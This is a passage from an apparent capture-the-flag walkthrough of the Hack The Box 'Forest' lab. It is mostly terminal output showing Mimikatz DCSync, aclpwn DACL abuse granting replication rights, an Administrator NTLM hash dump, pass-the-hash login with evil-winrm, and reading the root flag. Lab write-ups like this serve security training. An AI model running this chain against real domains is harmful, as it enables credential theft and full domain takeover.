mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
mimikatz # mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
ERROR mimikatz_doLocal ; "mimikatz" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # ERROR mimikatz_doLocal ; "[DC]" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
mimikatz #
we can try Invoke-Mimikatz.ps1 – Invoke-Mimikatz -Command ‘”lsadump::dcsync /domain:htb.local /user:Administrator”‘
but we get same error as above
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./Invoke-Mimikatz.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'
Access denied
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2579 char:27
+ $Processors = Get-WmiObject -Class Win32_Processor
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ... if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: FOREST.htb.local / S-1-5-21-3072663084-364016917-1341370565
.#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
we run the command again and choose 1
┌──(kali㉿kali)-[~]
└─$ ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
[!] Unsupported operation: GetChanges on HTB.LOCAL (Domain,Base)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer,Base)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 1
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE WINDOWS [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20230909-093211.restore
Then try mimikatz again and this time we get the hash
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'
Access denied
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2579 char:27
+ $Processors = Get-WmiObject -Class Win32_Processor
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ... if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: FOREST.htb.local / S-1-5-21-3072663084-364016917-1341370565
.#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : [email protected]
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 8/30/2021 5:51:58 PM
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
ntlm- 0: 32693b11e6aa90eb43d32c72a07ceea6
ntlm- 1: 9307ee5abf7791f3424d9d5148b20177
ntlm- 2: 32693b11e6aa90eb43d32c72a07ceea6
lm - 0: 9498c81fd53411e023fcd1ff4cd3e482
lm - 1: f505fe58b1dedbe3015454d212af5115
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : cad4a87763ba795c795b96486148bb95
* Primary:Kerberos-Newer-Keys *
Default Salt : HTB.LOCALAdministrator
Default Iterations : 4096
We use evil-winrm and pass the hash –evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/20/2019 4:04 PM Contacts
d-r--- 9/23/2019 2:15 PM Desktop
d-r--- 9/23/2019 3:46 PM Documents
d-r--- 9/20/2019 4:04 PM Downloads
d-r--- 9/20/2019 4:04 PM Favorites
d-r--- 9/20/2019 4:04 PM Links
d-r--- 9/20/2019 4:04 PM Music
d-r--- 9/20/2019 4:04 PM Pictures
d-r--- 9/20/2019 4:04 PM Saved Games
d-r--- 9/20/2019 4:04 PM Searches
d-r--- 9/20/2019 4:04 PM Videos
c*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/9/2023 5:38 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
cdb539c41b826bb97ec6dfbf750a375d
*Evil-WinRM* PS C:\Users\Administrator\Desktop>